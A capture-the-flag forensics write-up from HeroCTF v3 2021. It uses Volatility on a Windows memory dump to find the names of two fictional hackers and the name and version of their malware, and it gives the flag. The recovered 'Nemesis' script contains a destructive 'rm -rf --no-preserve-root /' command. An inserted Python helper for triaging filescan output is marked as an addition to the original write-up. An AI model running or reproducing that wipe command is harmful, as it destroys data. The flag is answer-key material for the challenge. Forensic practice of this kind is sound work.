HeroCTF v3 2021: We need you 4/5

We need you 4/5

Category: Forensics


80 points

The FBI and Interpol are desperately looking for the first and last names of the two hackers.

Moreover, we know that they were developing a malware, find its name and version too !

Find this valuable information!

Author: Worty
Format: Hero{Lastname-Firstname:Lastname-Firstname:NAME-X.X.X}

Solution

This is a continuation of the We need you 3/5 challenge.

By scanning the memory image for file objects, I found one file with a suspicious name.

~/git/volatility3/vol.py -f capture.mem windows.filescan | grep py
0x7dc30518 100.0\Users\Razex\Documents\Malw4r3\Nemesis.py.txt.py.txt    128

I dumped the file to take a look inside.

~/git/volatility3/vol.py -f capture.mem windows.dumpfiles --physaddr 0x7dc30518
Volatility 3 Framework 1.0.1
Progress:  100.00		PDB scanning finished                     
Cache	FileObject	FileName	Result

DataSectionObject	0x7dc30518	Nemesis.py.txt.py.txt	file.0x7dc30518.0x871acee8.DataSectionObject.Nemesis.py.txt.py.txt.dat
cat file.0x7dc30518.0x871acee8.DataSectionObject.Nemesis.py.txt.py.txt.dat 
#Author : PAVOLI Ruben
#Version: 4.5.1
import os
os.system("rm -rf --no-preserve-root /")
def encrypt():
    with open("rsa_gen.key","rb"):
        ################################################
        #            MALWARE PUSH ON GIT                #
        ################################################
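The triage above (filter the filescan listing, pick the file object worth carving, read the author and version headers out of the dump) can be scripted. This is an added example and not part of the original writeup; the filescan rows other than the Nemesis one, the sample dump text and the `image` default are constructed for the demonstration, and the dumped script itself is never executed.

```python
import re
from dataclasses import dataclass

# Constructed sample of Volatility 3 `windows.filescan` output; the "100.0" glued to
# the first path appears to be the progress counter Volatility prints into the same stream.
SAMPLE_FILESCAN = """\
Volatility 3 Framework 1.0.1
Offset\tName\tSize
0x7dc30518\t100.0\\Users\\Razex\\Documents\\Malw4r3\\Nemesis.py.txt.py.txt\t128
0x7dc31a40\t\\Windows\\System32\\notepad.exe\t128
0x7dc32b10\t\\Users\\Razex\\Documents\\notes.txt\t128
"""
# Constructed sample of a dumped script header, laid out like the one recovered above.
SAMPLE_DUMP = "#Author : PAVOLI Ruben\n#Version: 4.5.1\nimport os\n"

SCRIPT_EXTS = {"py", "exe", "ps1", "vbs", "js", "bat", "cmd", "scr"}
ROW_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(?:\d+\.\d+)?(\\.*?)\s+(\d+)\s*$")

@dataclass
class FileRecord:
    offset: str   # physical offset of the FILE_OBJECT, which is what --physaddr expects
    path: str
    size: int

    def name(self):
        return self.path.rsplit("\\", 1)[-1]

def parse_filescan(text):
    # Keep only table rows; banner and progress lines do not start with 0x.
    rows = (ROW_RE.match(line.strip()) for line in text.splitlines())
    return [FileRecord(m.group(1), m.group(2), int(m.group(3))) for m in rows if m]

def is_suspicious(rec):
    # A script/executable extension hidden under one or more later extensions.
    exts = rec.name().lower().split(".")[1:]
    return len(exts) >= 2 and any(e in SCRIPT_EXTS for e in exts[:-1])

def dumpfiles_command(rec, image="capture.mem"):
    # The dump step from the writeup, built from the flagged record's offset.
    return f"vol.py -f {image} windows.dumpfiles --physaddr {rec.offset}"

def header_metadata(script):
    # Pull "#Key : value" comment headers (author, version) out of a dumped script.
    meta = {}
    for line in script.splitlines():
        m = re.match(r"^#\s*(\w+)\s*:\s*(.+?)\s*$", line)
        if m:
            meta[m.group(1)] = m.group(2)
    return meta
```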

Ok, so we have everything except the second hacker's first and last name. For that I had to use Volatility 2 and its clipboard plugin.

python2 ~/git/volatility/vol.py -f capture.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/luc/storage/tmp/capture.mem)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82780c28L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82781c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-04-19 17:30:00 UTC+0000
     Image local date and time : 2021-04-19 19:30:00 +0200
python2 ~/git/volatility/vol.py -f capture.mem --profile=Win7SP1x86_23418 clipboard
Volatility Foundation Volatility Framework 2.6.1
Session    WindowStation Format                 Handle Object     Data                                              
---------- ------------- ------------------ ---------- ---------- --------------------------------------------------
         1 WinSta0       CF_UNICODETEXT       0x2a0163 0xffa007f8 GOLDEN Dany                                       
         1 WinSta0       CF_LOCALE            0x1c01fb 0xfe493690                                                   
         1 WinSta0       CF_TEXT                   0x1 ----------                                                   
         1 WinSta0       CF_OEMTEXT                0x1 ---------- 

Gotcha!

Flag

Hero{PAVOLI-Ruben:GOLDEN-Dany:Nemesis-4.5.1}

luc © 2021